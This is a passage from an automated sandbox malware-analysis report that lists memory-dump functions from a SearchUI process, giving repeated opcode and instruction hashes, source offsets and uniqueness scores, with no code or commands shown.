                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601338, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601B38, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601318, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601320, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600B28, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B1426017F8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600810, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B1426007E8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600FB8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601FB8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602FB8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600FC0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602FC0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600F98, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601798, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B1426017A0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601FA0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600FA8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601FA8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602FB0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600FB0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601088, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601890, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601068, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601070, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601838, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601840, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B1426010F8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B1426008F8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
